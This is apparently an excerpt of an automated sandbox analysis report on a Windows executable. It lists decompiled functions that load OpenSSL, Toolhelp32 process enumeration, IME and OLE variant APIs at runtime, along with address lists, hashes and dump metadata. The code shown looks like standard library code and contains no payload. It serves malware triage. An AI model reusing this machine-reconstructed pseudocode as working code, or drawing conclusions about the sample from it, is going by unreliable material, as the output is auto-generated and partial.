					if( *0x49d454 == 0 ||  *0x49d458 == 0 ||  *0x49d45c == 0 ||  *0x49d460 == 0 ||  *0x49d464 == 0 ||  *0x49d468 == 0 ||  *0x49d46c == 0 ||  *0x49d470 == 0 ||  *0x49d474 == 0 ||  *0x49d478 == 0 ||  *0x49d484 == 0 ||  *0x49d488 == 0 ||  *0x49d48c == 0 ||  *0x49d490 == 0 ||  *0x49d494 == 0 ||  *0x49d498 == 0 ||  *0x49d49c == 0 ||  *0x49d4a0 == 0 ||  *0x49d4a4 == 0 ||  *0x49d4a8 == 0 ||  *0x49d4ac == 0 ||  *0x49d4b0 == 0 ||  *0x49d4b4 == 0 ||  *0x49d4b8 == 0 ||  *0x49d4bc == 0 ||  *0x49d4c0 == 0 ||  *0x49d4c4 == 0 ||  *0x49d4c8 == 0 ||  *0x49d4cc == 0 ||  *0x49d4d0 == 0 ||  *0x49d4d4 == 0 ||  *0x49d4d8 == 0 ||  *0x49d4dc == 0 ||  *0x49d4e0 == 0 ||  *0x49d4e4 == 0 ||  *0x49d4e8 == 0 ||  *0x49d4ec == 0 ||  *0x49d4f0 == 0 ||  *0x49d4f4 == 0 ||  *0x49d4f8 == 0 ||  *0x49d4fc == 0 ||  *0x49d500 == 0 ||  *0x49d504 == 0 ||  *0x49d508 == 0 ||  *0x49d50c == 0 ||  *0x49d510 == 0 ||  *0x49d514 == 0 ||  *0x49d51c == 0 ||  *0x49d520 == 0 ||  *0x49d524 == 0 ||  *0x49d528 == 0 ||  *0x49d534 == 0 ||  *0x49d538 == 0 ||  *0x49d53c == 0 ||  *0x49d540 == 0 ||  *0x49d544 == 0 ||  *0x49d548 == 0 ||  *0x49d54c == 0 ||  *0x49d550 == 0 ||  *0x49d554 == 0 ||  *0x49d558 == 0 ||  *0x49d55c == 0 ||  *0x49d47c == 0 ||  *0x49d480 == 0 ||  *0x49d560 == 0 ||  *0x49d564 == 0 ||  *0x49d568 == 0 ||  *0x49d56c == 0 ||  *0x49d570 == 0 ||  *0x49d574 == 0 ||  *0x49d578 == 0 ||  *0x49d580 == 0 ||  *0x49d57c == 0) {
						_t158 = 0;
					} else {
						_t158 = 1;
					}
				}
				return _t158;
			}





                                                                                                                                                                                                                            0x004906b9
                                                                                                                                                                                                                            0x004906c2
                                                                                                                                                                                                                            0x004906ce
                                                                                                                                                                                                                            0x004906ce
                                                                                                                                                                                                                            0x004906d3
                                                                                                                                                                                                                            0x004906da
                                                                                                                                                                                                                            0x004906ea
                                                                                                                                                                                                                            0x004906f9
                                                                                                                                                                                                                            0x00490708
                                                                                                                                                                                                                            0x00490717
                                                                                                                                                                                                                            0x00490726
                                                                                                                                                                                                                            0x00490735
                                                                                                                                                                                                                            0x00490744
                                                                                                                                                                                                                            0x00490753
                                                                                                                                                                                                                            0x00490762
                                                                                                                                                                                                                            0x00490771
                                                                                                                                                                                                                            0x00490780
                                                                                                                                                                                                                            0x0049078f
                                                                                                                                                                                                                            0x0049079e
                                                                                                                                                                                                                            0x004907ad
                                                                                                                                                                                                                            0x004907bc
                                                                                                                                                                                                                            0x004907cb
                                                                                                                                                                                                                            0x004907da
                                                                                                                                                                                                                            0x004907e9
                                                                                                                                                                                                                            0x004907f8
                                                                                                                                                                                                                            0x00490807
                                                                                                                                                                                                                            0x00490816
                                                                                                                                                                                                                            0x00490825
                                                                                                                                                                                                                            0x00490834
                                                                                                                                                                                                                            0x00490843
                                                                                                                                                                                                                            0x00490852
                                                                                                                                                                                                                            0x00490861
                                                                                                                                                                                                                            0x00490870
                                                                                                                                                                                                                            0x0049087f
                                                                                                                                                                                                                            0x0049088e
                                                                                                                                                                                                                            0x0049089d
                                                                                                                                                                                                                            0x004908ac
                                                                                                                                                                                                                            0x004908bb
                                                                                                                                                                                                                            0x004908ca
                                                                                                                                                                                                                            0x004908d9
                                                                                                                                                                                                                            0x004908e8
                                                                                                                                                                                                                            0x004908f7
                                                                                                                                                                                                                            0x00490906
                                                                                                                                                                                                                            0x00490915
                                                                                                                                                                                                                            0x00490924
                                                                                                                                                                                                                            0x00490933
                                                                                                                                                                                                                            0x00490942
                                                                                                                                                                                                                            0x00490951
                                                                                                                                                                                                                            0x00490960
                                                                                                                                                                                                                            0x0049096f
                                                                                                                                                                                                                            0x0049097e
                                                                                                                                                                                                                            0x0049098d
                                                                                                                                                                                                                            0x0049099c
                                                                                                                                                                                                                            0x004909ab
                                                                                                                                                                                                                            0x004909ba
                                                                                                                                                                                                                            0x004909c9
                                                                                                                                                                                                                            0x004909d8
                                                                                                                                                                                                                            0x004909e7
                                                                                                                                                                                                                            0x004909f6
                                                                                                                                                                                                                            0x00490a05
                                                                                                                                                                                                                            0x00490a14
                                                                                                                                                                                                                            0x00490a23
                                                                                                                                                                                                                            0x00490a32
                                                                                                                                                                                                                            0x00490a41
                                                                                                                                                                                                                            0x00490a50
                                                                                                                                                                                                                            0x00490a5f
                                                                                                                                                                                                                            0x00490a6e
                                                                                                                                                                                                                            0x00490a7d
                                                                                                                                                                                                                            0x00490a8c
                                                                                                                                                                                                                            0x00490a9b
                                                                                                                                                                                                                            0x00490aaa
                                                                                                                                                                                                                            0x00490ab9
                                                                                                                                                                                                                            0x00490ac8
                                                                                                                                                                                                                            0x00490ad7
                                                                                                                                                                                                                            0x00490ae6
                                                                                                                                                                                                                            0x00490af5
                                                                                                                                                                                                                            0x00490b04
                                                                                                                                                                                                                            0x00490b13
                                                                                                                                                                                                                            0x00490b22
                                                                                                                                                                                                                            0x00490b31
                                                                                                                                                                                                                            0x00490b40
                                                                                                                                                                                                                            0x00490b4f
                                                                                                                                                                                                                            0x00490b5e
                                                                                                                                                                                                                            0x00490b6d
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490eeb
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490eef
                                                                                                                                                                                                                            0x00490b79
                                                                                                                                                                                                                            0x00490ef4

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(libeay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906C9
                                                                                                                                                                                                                              • Part of subcall function 0049058C: GetProcAddress.KERNEL32(00000000,00000000), ref: 004905C6
                                                                                                                                                                                                                              • Part of subcall function 00490648: GetProcAddress.KERNEL32(00000000,00000000), ref: 00490682
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(ssleay32.dll,00000001,00492B1E,00000001,004933E4,00000000,00493438,?,?,?,00000000,?,00493208,?,?,004930CF), ref: 004906E5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                            • String ID: EVP_md5$RAND_screen$SSL_CIPHER_description$SSL_CIPHER_get_bits$SSL_CIPHER_get_name$SSL_CIPHER_get_version$SSL_CTX_check_private_key$SSL_CTX_free$SSL_CTX_get_verify_depth$SSL_CTX_get_version_indy$SSL_CTX_load_verify_locations$SSL_CTX_new$SSL_CTX_set_cipher_list$SSL_CTX_set_client_CA_list$SSL_CTX_set_default_passwd_cb$SSL_CTX_set_default_passwd_cb_userdata$SSL_CTX_set_default_verify_paths$SSL_CTX_set_info_callback_indy$SSL_CTX_set_options_indy$SSL_CTX_set_session_id_context$SSL_CTX_set_verify$SSL_CTX_set_verify_depth$SSL_CTX_use_PrivateKey_file$SSL_CTX_use_certificate_file$SSL_SESSION_get_id_ctx_indy$SSL_SESSION_get_id_indy$SSL_accept$SSL_connect$SSL_free$SSL_get_current_cipher$SSL_get_error$SSL_get_ex_data$SSL_get_peer_certificate$SSL_get_session$SSL_library_init$SSL_load_client_CA_file$SSL_load_error_strings$SSL_new$SSL_peek$SSL_read$SSL_set_accept_state$SSL_set_connect_state$SSL_set_ex_data$SSL_set_fd$SSL_set_shutdown$SSL_shutdown$SSL_state_string_long$SSL_write$SSLv23_client_method$SSLv23_method$SSLv23_server_method$SSLv2_client_method$SSLv2_method$SSLv2_server_method$SSLv3_client_method$SSLv3_method$SSLv3_server_method$TLSv1_client_method$TLSv1_method$TLSv1_server_method$X509_NAME_hash$X509_NAME_oneline$X509_STORE_CTX_get_app_data_indy$X509_STORE_CTX_get_current_cert$X509_STORE_CTX_get_error$X509_STORE_CTX_get_error_depth$X509_STORE_CTX_set_error$X509_digest$X509_get_issuer_name$X509_get_notAfter_indy$X509_get_notBefore_indy$X509_get_subject_name$X509_set_issuer_name$X509_set_subject_name$des_ecb_encrypt$des_set_key$des_set_odd_parity$libeay32.dll$ssleay32.dll
                                                                                                                                                                                                                            • API String ID: 2574300362-3914122982
                                                                                                                                                                                                                            • Opcode ID: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                                                                                                                                                                                            • Instruction ID: 3fc9e01923c26730d663d19a2b901ff2da1ed37202cb3e817e08d019f5698bc5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fe4e2f35140f34da03946c322c5fb95e3d1eee53cfea54a21f1e7ca64066c46
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9202C874D00205AEDF75EB6DA90935A3EA1E76432DF06443BA908C72B1D77C9884CF9E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004728A4 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004728A4() {

				if( *0x49ebf4 == 0) {
					 *0x49ebf4 = GetModuleHandleA("kernel32.dll");
					if( *0x49ebf4 != 0) {
						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
					}
				}
				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                                                                                                                                                            0x004728ad
                                                                                                                                                                                                                            0x004728bd
                                                                                                                                                                                                                            0x004728c2
                                                                                                                                                                                                                            0x004728d5
                                                                                                                                                                                                                            0x004728e7
                                                                                                                                                                                                                            0x004728f9
                                                                                                                                                                                                                            0x0047290b
                                                                                                                                                                                                                            0x0047291d
                                                                                                                                                                                                                            0x0047292f
                                                                                                                                                                                                                            0x00472941
                                                                                                                                                                                                                            0x00472953
                                                                                                                                                                                                                            0x00472965
                                                                                                                                                                                                                            0x00472977
                                                                                                                                                                                                                            0x00472989
                                                                                                                                                                                                                            0x0047299b
                                                                                                                                                                                                                            0x004729ad
                                                                                                                                                                                                                            0x004729bf
                                                                                                                                                                                                                            0x004729d1
                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004728c2
                                                                                                                                                                                                                            0x004729eb
                                                                                                                                                                                                                            0x004729f9
                                                                                                                                                                                                                            0x004729fa
                                                                                                                                                                                                                            0x004729fd
                                                                                                                                                                                                                            0x004729fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,?,?,00475AEA,00000000,00475BD5), ref: 004728B8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                                                                                                            • Opcode ID: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                                                                                                                                                                                            • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d0ab3d19200f094b910b8b7cdad19644051f4102d4b70dba85ba81514668e68b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00445F34 Relevance: 50.8, APIs: 15, Strings: 14, Instructions: 95libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E00445F34() {
				int _v8;
				intOrPtr _t4;
				struct HINSTANCE__* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t15;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t29;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t44;

				_t42 = _t44;
				_t4 =  *0x49de44; // 0x49e744
				if( *((char*)(_t4 + 0xc)) == 0) {
					return _t4;
				} else {
					_v8 = SetErrorMode(0x8000);
					_push(_t42);
					_push(0x44609a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t44;
					if( *0x49eb6c == 0) {
						 *0x49eb6c = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
					}
					if( *0x49bd4c == 0) {
						 *0x49bd4c = LoadLibraryA("imm32.dll");
						if( *0x49bd4c != 0) {
							_t11 =  *0x49bd4c; // 0x0
							 *0x49eb70 = GetProcAddress(_t11, "ImmGetContext");
							_t13 =  *0x49bd4c; // 0x0
							 *0x49eb74 = GetProcAddress(_t13, "ImmReleaseContext");
							_t15 =  *0x49bd4c; // 0x0
							 *0x49eb78 = GetProcAddress(_t15, "ImmGetConversionStatus");
							_t17 =  *0x49bd4c; // 0x0
							 *0x49eb7c = GetProcAddress(_t17, "ImmSetConversionStatus");
							_t19 =  *0x49bd4c; // 0x0
							 *0x49eb80 = GetProcAddress(_t19, "ImmSetOpenStatus");
							_t21 =  *0x49bd4c; // 0x0
							 *0x49eb84 = GetProcAddress(_t21, "ImmSetCompositionWindow");
							_t23 =  *0x49bd4c; // 0x0
							 *0x49eb88 = GetProcAddress(_t23, "ImmSetCompositionFontA");
							_t25 =  *0x49bd4c; // 0x0
							 *0x49eb8c = GetProcAddress(_t25, "ImmGetCompositionStringA");
							_t27 =  *0x49bd4c; // 0x0
							 *0x49eb90 = GetProcAddress(_t27, "ImmIsIME");
							_t29 =  *0x49bd4c; // 0x0
							 *0x49eb94 = GetProcAddress(_t29, "ImmNotifyIME");
						}
					}
					_pop(_t40);
					 *[fs:eax] = _t40;
					_push(0x4460a1);
					return SetErrorMode(_v8);
				}
			}


















                                                                                                                                                                                                                            0x00445f35
                                                                                                                                                                                                                            0x00445f39
                                                                                                                                                                                                                            0x00445f42
                                                                                                                                                                                                                            0x004460a4
                                                                                                                                                                                                                            0x00445f48
                                                                                                                                                                                                                            0x00445f52
                                                                                                                                                                                                                            0x00445f57
                                                                                                                                                                                                                            0x00445f58
                                                                                                                                                                                                                            0x00445f5d
                                                                                                                                                                                                                            0x00445f60
                                                                                                                                                                                                                            0x00445f6a
                                                                                                                                                                                                                            0x00445f83
                                                                                                                                                                                                                            0x00445f83
                                                                                                                                                                                                                            0x00445f8f
                                                                                                                                                                                                                            0x00445f9f
                                                                                                                                                                                                                            0x00445fab
                                                                                                                                                                                                                            0x00445fb6
                                                                                                                                                                                                                            0x00445fc1
                                                                                                                                                                                                                            0x00445fcb
                                                                                                                                                                                                                            0x00445fd6
                                                                                                                                                                                                                            0x00445fe0
                                                                                                                                                                                                                            0x00445feb
                                                                                                                                                                                                                            0x00445ff5
                                                                                                                                                                                                                            0x00446000
                                                                                                                                                                                                                            0x0044600a
                                                                                                                                                                                                                            0x00446015
                                                                                                                                                                                                                            0x0044601f
                                                                                                                                                                                                                            0x0044602a
                                                                                                                                                                                                                            0x00446034
                                                                                                                                                                                                                            0x0044603f
                                                                                                                                                                                                                            0x00446049
                                                                                                                                                                                                                            0x00446054
                                                                                                                                                                                                                            0x0044605e
                                                                                                                                                                                                                            0x00446069
                                                                                                                                                                                                                            0x00446073
                                                                                                                                                                                                                            0x0044607e
                                                                                                                                                                                                                            0x0044607e
                                                                                                                                                                                                                            0x00445fab
                                                                                                                                                                                                                            0x00446085
                                                                                                                                                                                                                            0x00446088
                                                                                                                                                                                                                            0x0044608b
                                                                                                                                                                                                                            0x00446099
                                                                                                                                                                                                                            0x00446099

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 00445F4D
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,0044609A,?,00008000), ref: 00445F71
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00445F7E
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(imm32.dll,00000000,0044609A,?,00008000), ref: 00445F9A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00445FBC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00445FD1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00445FE6
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00445FFB
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00446010
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00446025
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0044603A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 0044604F
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00446064
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00446079
                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,004460A1,00008000), ref: 00446094
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                                                                                                            • String ID: DI$ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                                                                                                            • API String ID: 3397921170-1483999256
                                                                                                                                                                                                                            • Opcode ID: d828e86c6b6542eee2b05fbf6c56a19a2c2494676502a401f37b59ea03610f91
                                                                                                                                                                                                                            • Instruction ID: ef3ad77a40a7235546353be2f7b1bc646a7dfd85628d1f60096bddc463f7a869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d828e86c6b6542eee2b05fbf6c56a19a2c2494676502a401f37b59ea03610f91
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7315470948340AFE700EBB6FD56B1A37A9E325704B11863BB5019BAD3D77D68009F5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040F7D0 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040F7D0() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x49e7a4 = E0040F7A4("VariantChangeTypeEx", E0040F340, _t91);
				 *0x49e7a8 = E0040F7A4("VarNeg", E0040F370, _t91);
				 *0x49e7ac = E0040F7A4("VarNot", E0040F370, _t91);
				 *0x49e7b0 = E0040F7A4("VarAdd", E0040F37C, _t91);
				 *0x49e7b4 = E0040F7A4("VarSub", E0040F37C, _t91);
				 *0x49e7b8 = E0040F7A4("VarMul", E0040F37C, _t91);
				 *0x49e7bc = E0040F7A4("VarDiv", E0040F37C, _t91);
				 *0x49e7c0 = E0040F7A4("VarIdiv", E0040F37C, _t91);
				 *0x49e7c4 = E0040F7A4("VarMod", E0040F37C, _t91);
				 *0x49e7c8 = E0040F7A4("VarAnd", E0040F37C, _t91);
				 *0x49e7cc = E0040F7A4("VarOr", E0040F37C, _t91);
				 *0x49e7d0 = E0040F7A4("VarXor", E0040F37C, _t91);
				 *0x49e7d4 = E0040F7A4("VarCmp", E0040F388, _t91);
				 *0x49e7d8 = E0040F7A4("VarI4FromStr", E0040F394, _t91);
				 *0x49e7dc = E0040F7A4("VarR4FromStr", E0040F400, _t91);
				 *0x49e7e0 = E0040F7A4("VarR8FromStr", E0040F46C, _t91);
				 *0x49e7e4 = E0040F7A4("VarDateFromStr", E0040F4D8, _t91);
				 *0x49e7e8 = E0040F7A4("VarCyFromStr", E0040F544, _t91);
				 *0x49e7ec = E0040F7A4("VarBoolFromStr", E0040F5B0, _t91);
				 *0x49e7f0 = E0040F7A4("VarBstrFromCy", E0040F630, _t91);
				 *0x49e7f4 = E0040F7A4("VarBstrFromDate", E0040F6A0, _t91);
				_t46 = E0040F7A4("VarBstrFromBool", E0040F710, _t91);
				 *0x49e7f8 = _t46;
				return _t46;
			}






                                                                                                                                                                                                                            0x0040f7de
                                                                                                                                                                                                                            0x0040f7f2
                                                                                                                                                                                                                            0x0040f808
                                                                                                                                                                                                                            0x0040f81e
                                                                                                                                                                                                                            0x0040f834
                                                                                                                                                                                                                            0x0040f84a
                                                                                                                                                                                                                            0x0040f860
                                                                                                                                                                                                                            0x0040f876
                                                                                                                                                                                                                            0x0040f88c
                                                                                                                                                                                                                            0x0040f8a2
                                                                                                                                                                                                                            0x0040f8b8
                                                                                                                                                                                                                            0x0040f8ce
                                                                                                                                                                                                                            0x0040f8e4
                                                                                                                                                                                                                            0x0040f8fa
                                                                                                                                                                                                                            0x0040f910
                                                                                                                                                                                                                            0x0040f926
                                                                                                                                                                                                                            0x0040f93c
                                                                                                                                                                                                                            0x0040f952
                                                                                                                                                                                                                            0x0040f968
                                                                                                                                                                                                                            0x0040f97e
                                                                                                                                                                                                                            0x0040f994
                                                                                                                                                                                                                            0x0040f9aa
                                                                                                                                                                                                                            0x0040f9ba
                                                                                                                                                                                                                            0x0040f9c0
                                                                                                                                                                                                                            0x0040f9c7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040F7D9
                                                                                                                                                                                                                              • Part of subcall function 0040F7A4: GetProcAddress.KERNEL32(00000000), ref: 0040F7BD
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                            • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                            • Opcode ID: 80ab367ea45039dbd2bc01dee9e52f96cbb8d261e3d937e86e9258942a4f4849
                                                                                                                                                                                                                            • Instruction ID: 068c6e066db7a12a78cda71ceaebb25bc6294a0e525a49770a7ca0196cea08b9
